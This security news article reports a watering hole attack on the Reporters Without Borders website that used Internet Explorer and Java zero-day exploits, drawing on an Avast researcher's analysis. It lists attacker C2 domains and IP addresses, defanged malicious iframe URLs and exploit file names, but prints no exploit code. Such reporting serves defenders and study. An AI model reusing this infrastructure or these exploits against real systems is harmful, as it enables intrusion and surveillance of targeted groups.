The Java saga continued when unknown, and apparently well concealed goons exploited recent Java and Internet Explorer zero-days to compromise the website of the French-based, free-press advocacy group, Reporters Without Borders. The attack, which attempted to take advantage of the time-gulf that separates Oracle’s patch release from their users’ application of it, is part of a watering hole campaign also targeting Tibetan and Uygur human rights groups as well as Hong Kong and Taiwanese political parties and other non-governmental organizations.
Writing on the Avast Security blog, Jindrich Kubec claims it is safe to assume that China is behind these attacks. Kubec’s assertion appears to be based, at least in part, on the reality that visitors to the watering hole sites (and the sites themselves for that matter), are, for lack of a better way to put it, individuals, organizations, and political entities that the People’s Republic publically does not like.
The watering hole attack is a social engineering technique whereby attackers attempt to compromise websites that are not directly or officially related to their intended targets but which they believe members of an intended target organization are likely to visit.
According to the Avast report, the attackers used the recent Internet Explorer and Java vulnerabilities, identified as CVE-2012-4792 and CVE-2013-0422 respectively. Microsoft resolved the IE bug with MS13-008 and Oracle fixed theirs with Java 7 update 11.
In the end, if the exploits succeed they will infect victim machines with either a remote access trojan that phones home to the Singapore-based “luckmevnc.myvnc.com” (IP address 112.140.186.252) or an injector that flashes a fake error page while downloading a similar remote access tool that communicates with the Hong Kong-based “d.wt.ikwb.com” (58.64.179.139).
An English version of the Reporters Without Borders site contained a suspicious jacvascript inclusion. That inclusion creates a cookie called “somethingbbbbb” designed to expire after one day. The same cookie was used in similar attacks a few years ago and Kubec believes it could be related to the legitimate m.js cookie, “somethingeeee,” used by a Honk Kong political party.
Kubec also determined that an iframe from hxxp://newsite.acmetoy.com/m/d/pdf.html targeted users visiting the site in IE 8. There were an additional two iframes, hxxp://newsite.acmetoy.com/m/d/pdf.html and hxxp://newsite.acmetoy.com/m/d/javapdf.html reserved for those that visited the site on a browser other than IE.
According to Kubec’s analysis of newsite.acmetoy.com, a number of files relating to the IE exploit listed above, including a DOITYOUR obfuscated Javascript file which attempts to exploit the latest Internet Explorer vulnerability as well as DOITYOUR variants of “today.swf,” “news.html,” and “robots.txt.”
The site also attempted to exploit at least one other Java vulnerability from back in 2011 as well (CVE-2011-3544) and contained the related files, “javapdf.html,” a javascript file for both vulnerabilities, “AppletHigh.jar,” a CVE-2013-0422 exploit, and “AppletLow.jar,” a CVE-2011-3544 exploit.
In an analysis of other site (98.129.194.210), Kubec found that it contained the same malicious Java-related content and reasons that it probably serves as a backup to the first in the event of a takedown.
Avast said it notified Reporters Without Borders.